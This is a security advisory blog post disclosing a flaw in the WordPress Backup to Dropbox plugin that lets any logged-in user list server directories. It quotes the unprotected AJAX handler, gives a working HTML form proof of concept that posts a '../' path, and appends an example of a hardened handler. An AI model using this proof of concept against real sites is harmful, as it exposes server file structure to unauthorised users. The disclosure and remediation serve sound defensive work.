14 Feb

A Recently Closed Plugin Contains a Vulnerability That Allows Anyone Logged in to WordPress to View Directory Listings

Today we had somebody contact us asking if we had any insight into why the plugin WordPress Backup to Dropbox was removed from the Plugin Directory (after seeing one of yesterday’s posts). Our guess on that would be that it has to do with the plugin no longer working, but while doing a quick look over the plugin we did find a vulnerability in it that allows anyone logged in to WordPress to view a list of the files and directories in any directory on the server they specify.

The plugin makes the function backup_to_dropbox_file_tree() accessible to anyone logged in to WordPress through WordPress’ AJAX functionality:

add_action('wp_ajax_file_tree', 'backup_to_dropbox_file_tree');

That function will load up the file /Views/wpb2d-file-tree.php:

function backup_to_dropbox_file_tree() {
    // no capability or nonce check before the view is included
    include 'Views/wpb2d-file-tree.php';
}

That file will list the files and directories located in the directory on the server specified by the POST input “dir”, with no check of who is making the request or of which directory is being requested.

Proof of Concept

The following proof of concept will return a listing of the files and directories in the root directory of the WordPress install, when logged in to WordPress. The contents of the resulting page are hidden using “display: none” styling, so you either need to remove that styling or view the page’s source to see the results.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=file_tree" method="POST">
<input type="hidden" name="dir" value="../" />
<input type="submit" value="Submit" />
</form>
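For comparison, this is how the AJAX handler should have been written: an added example of a hardened handler, not code from the WordPress Backup to Dropbox plugin. It assumes the view file reads the directory from a `$dir` variable, and `WPB2D_BACKUP_ROOT` is a hypothetical constant naming the one directory tree the plugin is allowed to browse.

```php
<?php
// Added example (not the plugin's own code): the same AJAX action with the three
// checks the original handler lacks. Assumes the view reads $dir and that
// WPB2D_BACKUP_ROOT (hypothetical) names the only directory tree it may list.

add_action('wp_ajax_file_tree', 'wpb2d_hardened_file_tree');

function wpb2d_hardened_file_tree() {
    // 1. Only administrators may browse the server's file system, not any
    //    logged-in user (subscribers included) as in the original handler.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient permissions', 403);
    }

    // 2. Require a nonce issued by the plugin's own admin page so a logged-in
    //    administrator cannot be made to submit the request from another site.
    check_ajax_referer('wpb2d_file_tree', 'nonce');

    // 3. Confine the requested path to the tree the plugin is meant to browse,
    //    so "../" or an absolute path cannot reach the rest of the server.
    $requested = isset($_POST['dir']) ? wp_unslash($_POST['dir']) : '';
    $dir = wpb2d_resolve_within_root($requested, WPB2D_BACKUP_ROOT);
    if ($dir === false) {
        wp_send_json_error('directory outside allowed tree', 400);
    }

    include 'Views/wpb2d-file-tree.php'; // the view now only sees a vetted $dir
    wp_die();
}

// Resolve $relative against $root and return the canonical directory, or false
// if it does not exist or escapes $root (via "../" or a symlink pointing out).
function wpb2d_resolve_within_root($relative, $root) {
    $root = realpath($root);
    if ($root === false) {
        return false;
    }
    $candidate = realpath($root . DIRECTORY_SEPARATOR . ltrim($relative, '/\\'));
    if ($candidate === false || !is_dir($candidate)) {
        return false;
    }
    // Compare with a trailing separator so "/srv/backups2" is not accepted as
    // lying inside "/srv/backups".
    $rootPrefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $root && strpos($candidate . DIRECTORY_SEPARATOR, $rootPrefix) !== 0) {
        return false;
    }
    return $candidate;
}
```

With these checks in place the proof of concept above fails at the capability check for non-administrators and at the path check for “../” even when an administrator submits it.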
